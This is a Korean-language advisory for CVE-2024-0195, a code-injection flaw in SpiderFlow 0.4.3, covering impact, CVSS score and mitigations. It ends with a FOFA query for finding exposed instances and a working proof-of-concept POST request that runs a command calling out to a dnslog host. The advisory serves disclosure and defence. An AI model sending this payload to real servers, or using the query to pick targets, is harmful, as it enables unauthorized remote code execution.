
CVE-2024-0195에 대한 개념 증명 익스플로잇, SpiderFlow 0.4.3의 치명적인 코드 삽입 취약점으로 FunctionService.saveFunction 엔드포인트를 통해 원격 코드 실행을 가능하게 합니다.
CVE-2024-0195는 spider-flow 0.4.3 웹 애플리케이션의 FunctionController.java 파일 내 FunctionService.saveFunction 함수에서 발생하는 치명적인 코드 인젝션 취약점입니다. 공격자는 원격으로 악성 코드를 주입하여 서버에서 실행시킬 수 있습니다. 이로 인해 애플리케이션이 완전히 손상될 수 있습니다.
이 취약점은 취약한 spider-flow 애플리케이션이 호스팅된 서버에서 원격 코드 실행을 허용하므로 매우 심각합니다. 공격자는 서버를 완전히 장악하고, 민감한 데이터를 탈취하며, 악성코드나 암호화폐 채굴기를 설치하고, 네트워크 내부에서 추가 공격을 수행할 수 있습니다. 애플리케이션과 서버의 기밀성, 무결성, 가용성이 모두 치명적인 영향을 받습니다.
패치된 버전이 명시적으로 언급되지 않았으므로 현재로서는 패치가 옵션이 아닌 것으로 보입니다. 취약점이 공개적으로 공개되었고 익스플로잇이 이용 가능하므로 즉각적인 완화 조치가 중요합니다.
공식 패치가 출시될 때까지 spider-flow 0.4.3을 즉시 오프라인으로 전환하거나 신뢰할 수 있는 네트워크/사용자로만 접근을 제한해야 합니다. 웹 애플리케이션 방화벽이나 기타 입력 검증 제어를 구성하여 임시 완화 조치로 코드 인젝션 공격 시도를 탐지 및 차단할 수 있습니다. 그러나 이는 완전한 해결책이 아니며, 수정된 릴리스가 제공되는 즉시 취약한 버전을 업그레이드해야 합니다.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ 개념 증명
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B